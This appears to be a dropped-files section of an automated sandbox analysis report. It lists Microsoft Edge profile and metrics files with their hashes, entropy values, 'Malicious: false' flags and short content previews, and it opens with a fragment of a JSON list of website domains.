Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD575-13A0.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.04766817260881691
Encrypted:	false
SSDEEP:	192:P/K0t0pqtmCnOAHpDXJPVN2Ohm7+G1gsXejIq5EvcPYDhL5Nvf+RQ9abLpRFzn8H:P1t0ctpP8qVuhttmD3h08T2RGOD
MD5:	DB8B83D3B9AD9B3E6922056D2CE5B7B3
SHA1:	6627BAFBCF46A4852246A1BF65F2EB452CF66871
SHA-256:	5C75832FE918AA991DB9CED44045F533A8391B35F8E84BCEF5E997B296EF8140
SHA-512:	6594B2EC2600872F5D7E9C85250966E2A65E92185F443B2E66DAF4E83724798ABECD3DE6A990E13F4B83952921556A76A7842AC74DDBFB121272D96DE6F0E6BC
Malicious:	false
Preview:	...@..@...@.....C.].....@............... k...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".wtdjlj20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............2..................8...w..U..G..>.........."....."...24.."."GTJZX6ysgheZqBTPXcKXA+Ak8runmRph4F61XypBFRM=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z........W@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2........9....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD575-B14.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.4552042449534509
Encrypted:	false
SSDEEP:	3072:7ROg/FGObM0W75xKWho/RcMvVLNJPAha6gqYC5ROzHrdr+UN5Ag1HF:wg/dcxKW2/Rc6N5OazquzLdr+UN5AaH
MD5:	AAFD0FAD55206BEC98724138DAE87C5D
SHA1:	59747F7541969D09D789BBBFDDE5B408B2BFD4D2
SHA-256:	70DC58EDFA8E73B09A4BF7F220B84503A6DC8D7FE09A50AC34513EF35CBD4B50
SHA-512:	F00539E541EFAA875D544181753BBF721F807622808FC39A8F0475799DBC7FF25058B474AEE30FA84B9BB06A917733C671327AF4D8A87A1F3D7FBDC41481C04E
Malicious:	false
Preview:	...@..@...@.....C.].....@...............h...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".wtdjlj20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............2..................8...w..U?:K...G..>.........."....."...24.."."GTJZX6ysgheZqBTPXcKXA+Ak8runmRph4F61XypBFRM=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z........W@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ ...2.........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.186405996455797
Encrypted:	false
SSDEEP:	3:FiWWltlUkzpbazHSAS219jlV/TUqjNlWBVP/Sh/Jzv6cRBAVIGGgphVE7GC/Ollt:o1U6BaYIlWBVsJD6dpPhVeGC/O/
MD5:	0D0C6A5A14BC2141201C32A1F7C87A09
SHA1:	CA25216B59523CCC5DFAFB86D4B4D265A6B1BA53
SHA-256:	78ECB5979E18356057D4F459FD12670B202B19E936991A6CCB9931429F732056
SHA-512:	A75F19DDAF31A241EA098482ECE561FC94A33322365289161BDEE95BC4B6429989B32E15CBE6C150A2254AA1388BAF85746CFA7469137F4FBD03F76F7FAF77FB
Malicious:	false
Preview:	sdPC....................i...\|.@..s..."GTJZX6ysgheZqBTPXcKXA+Ak8runmRph4F61XypBFRM="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8963f191-f8e0-42ec-8449-d20a8242b3e6............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0e41a008-f806-4ffe-b9e1-0acc52134ab8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40504
Entropy (8bit):	5.561572786663038
Encrypted:	false
SSDEEP:	768:vebmtU7pLGLhXVWPPjfR38F1+UoAYDCx9Tuqh0VfUC9xbog/OVhf2F8ztrw2wk9b:vebmtYchXVWPPjfR3u1ja0f2SzW2wkMq
MD5:	01D1B177E5074C334A31CBAB0400CF72
SHA1:	DFE70FF7179A4D0CDB30486BB982BFA1EBC875BE
SHA-256:	36B6F7CDE5B58FA899D6570F1F3F7F15DEDCC313B7454B5E0EC7086E279EE385
SHA-512:	24D0FF70CAEE01165B0934A37425D604315FC67D3647A55C63D7CB87E7AB4B388B9102CC25EFC937AE9F376D88DBA76177ED57819CE964842C9C6DFEA1B5FF33
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380904566154328","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380904566154328","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0f2c90c9-6713-4e38-8cc7-7a6961b9f3b0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3981003b-bb87-4b6d-bdb0-9498baaaaeef.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17463), with no line terminators
Category:	dropped
Size (bytes):	17467
Entropy (8bit):	5.49033586277199
Encrypted:	false
SSDEEP:	192:st6J99QTryDigabatSuyplsfb7IlN6x6v66kdjeDPYKwFwwTTVAEr3O8obV+FTZ9:st6PGKSu4lsfb7i46ijfTFQbG9Qwc90
MD5:	89A00BC7FE07151A00D2F97456883DAB
SHA1:	2D9A6D152D9BD43091F192E8B7DB4F46CB274CF2
SHA-256:	B9626F10321CF5BC98B965169FD9011EA4FEAF7042FE65055D747AF90242719E
SHA-512:	44176C9AFD7BE09376F527209B5C9434509655867E4B56598AFA5790CBB7C3F73D49E53B9497BD4741DD04211E2390BA607736B52E4C69F84475A9CD435A1948
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904566875568","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\48f0c6d6-5908-4048-b474-db29f8764b3f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\677af174-a813-4355-91d9-c4039e7dc0e5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10944
Entropy (8bit):	5.1595815897693855
Encrypted:	false
SSDEEP:	192:st6kdplsfb7IlN6xykdjeDPYKwFOO8obV+FTZQwne1y93HPXYJ:st6Qlsfb7i4LxbG9Qwz90
MD5:	A69B58634BEDFAC8D1946076B296A264
SHA1:	D5A108ED4E8343FA358A4B35255699C8ECC8A2B5
SHA-256:	47B9AFB0A5E04547DADCA34DF322992C7FF17042C7A25A4D359859AD3652F75F
SHA-512:	A2E0754C40D41454F3ECDDE2AF0E43629ED6D184DFC0187B58ED55D978CFC238403F251CE08F04262F9DB82A197710D449D3CB78252F6ACA92475D13FF03F5B2
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904566875568","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\96f494da-58e9-420e-9199-22b5314b2826.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17463), with no line terminators
Category:	dropped
Size (bytes):	17467
Entropy (8bit):	5.490446300594533
Encrypted:	false
SSDEEP:	192:st6J99QTryDigabatSuyplsfb7IlN6x6v66kdjeDPYKwFwwTTVAEr3O8obV+FTZO:st6PGKSu4lsfb7i46ijfTFQbG9Qwz90
MD5:	EEA4C5D78BE8203BD449A6D217DFC104
SHA1:	572E3A0CA5BCFD6630E12276E3243215B98BE186
SHA-256:	F46BE7C9B3D204E5A1D358FAE6CB89621131AD0B6213716418197BF2AAB0B575
SHA-512:	451B91F23A143E57227CD38C9EC5191A13D4DF1FC2726005528A175D2E4D69A320679DDC1D8B2D7109D7C664A4167015D0CE3207C518F875058CCFF95546DECC
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904566875568","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9b946b73-87a2-4ddb-9b27-47f0f67a43fa.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40503
Entropy (8bit):	5.561561846350213
Encrypted:	false
SSDEEP:	768:vebmtU7pLGLhXVWPPjfK38F1+UoAYDCx9Tuqh0VfUC9xbog/OVhf2F8ztrw2wX91:vebmtYchXVWPPjfK3u1ja0f2SzW2wXM4
MD5:	3FF35E2B23C4F087F9C8900D8085619F
SHA1:	C8935C9B08EA8478C51558253BD749CEAD21669D
SHA-256:	1C36E67EEE300919D5754C2CD0FB622E309F0ACB5C9AE8E26B1CDB8CE029A860
SHA-512:	C4DA6967F0F3E11E25890618F79F24DD8CF663CED6037E649AF40C32C1BCB851FE69E34FB55A351CFA72B512D167194DB4067BF94FED104C24703CC11F6DF0B6
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380904566154328","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380904566154328","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	303
Entropy (8bit):	5.3030196512070775
Encrypted:	false
SSDEEP:	6:iOrv4Cq1Fi23oH+Tcwtp3hBtB2KLl5vS/FN+q2PFi23oH+Tcwtp3hBWsIFUv:72ZYebp3dFLaFIvdZYebp3eFUv
MD5:	088E1D619327F59882F322166C1F7C65
SHA1:	9959D710EF765E6EDFB94C722DA7073B80B80191
SHA-256:	0C7B8255CAA19E8C0BC0AEFDE0C220546060DDEDD6F08878C81BC020F1F5B3E8
SHA-512:	1076E99F3FAC64FE7CD590B67337D2605B36C6027B2D0A0FDF007407DBBFBF997D73B07713562FC7EC17E3B54228C59292E3F4AA5CCCD762AAD65489D1538DAD
Malicious:	false
Preview:	2025/01/09-08:56:13.389 5c8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/01/09-08:56:13.404 5c8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	2163821
Entropy (8bit):	5.222885221837779
Encrypted:	false
SSDEEP:	24576:tZPeZpVNfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:tZWZpVNfx2mjF
MD5:	873F66867EB1C1E861F460D6E5FDE4ED
SHA1:	93640C780642EC73C5A222FD9C792A8B8D25DDAD
SHA-256:	F4232675459F3E1B7A78389C943966519BC6358B276057866139ED975AF8AF1D
SHA-512:	F39DA1FAC526A80EB4A9F3772460A02013BF92B7C21B52FF5DD59F17DE6A3102957D3DDAA9AE1834533D5EE1015186832030A83A5A0F70A321DD40BFB47EC94B
Malicious:	false
Preview:	...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4...13340972966846363.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	329
Entropy (8bit):	5.174178970568165
Encrypted:	false
SSDEEP:	6:iOrvJQ9+q2PFi23oH+Tcwt9Eh1tIFUtJvPZZmwPvvVkwOFi23oH+Tcwt9Eh15LJ:7tQ4vdZYeb9Eh16FUtr/d5wZYeb9Eh1H
MD5:	C41E4127CB3E25DE57043A87175F6D37
SHA1:	67C420CA2FCB9B7BE2579A4369F2395FBAB3C7F3
SHA-256:	7F69FFD0D5836D98692AAA406626A0C4482BC4CB601A8D4AE1ACB192F947C409
SHA-512:	F98B3B2AA9674439A661D3B21D4F665D947AB6A192DF0145BFD353B109EC9715E102DA1C17BA230D73FAD4FEA774815EE764CF4ACF750005FF644BFA51636321
Malicious:	false
Preview:	2025/01/09-08:56:13.366 6e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/09-08:56:13.367 6e8 Recovering log #3.2025/01/09-08:56:13.372 6e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	329
Entropy (8bit):	5.174178970568165
Encrypted:	false
SSDEEP:	6:iOrvJQ9+q2PFi23oH+Tcwt9Eh1tIFUtJvPZZmwPvvVkwOFi23oH+Tcwt9Eh15LJ:7tQ4vdZYeb9Eh16FUtr/d5wZYeb9Eh1H
MD5:	C41E4127CB3E25DE57043A87175F6D37
SHA1:	67C420CA2FCB9B7BE2579A4369F2395FBAB3C7F3
SHA-256:	7F69FFD0D5836D98692AAA406626A0C4482BC4CB601A8D4AE1ACB192F947C409
SHA-512:	F98B3B2AA9674439A661D3B21D4F665D947AB6A192DF0145BFD353B109EC9715E102DA1C17BA230D73FAD4FEA774815EE764CF4ACF750005FF644BFA51636321
Malicious:	false
Preview:	2025/01/09-08:56:13.366 6e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/09-08:56:13.367 6e8 Recovering log #3.2025/01/09-08:56:13.372 6e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4628984605712779
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBueG:TouQq3qh7z3bY2LNW9WMcUvBueG
MD5:	ACADEB7DC7C411EC05D72CD9D7A721FC
SHA1:	C1BB9502679C0D8103C86DA1CA53D20BD90C33D5
SHA-256:	C1670CEE7D7157E2D41AA97AA577CBAF1B12AA75F63A6C10AF8998A80B4B05A8
SHA-512:	8651B8F1D735FE5F25D7DCC8B0A58350F513AAB643EB1A06C3A49998F299819CA781FBBB25951CB6B43C96207EEC6810B4D1C7FA645B60DC555863FD18E894A0
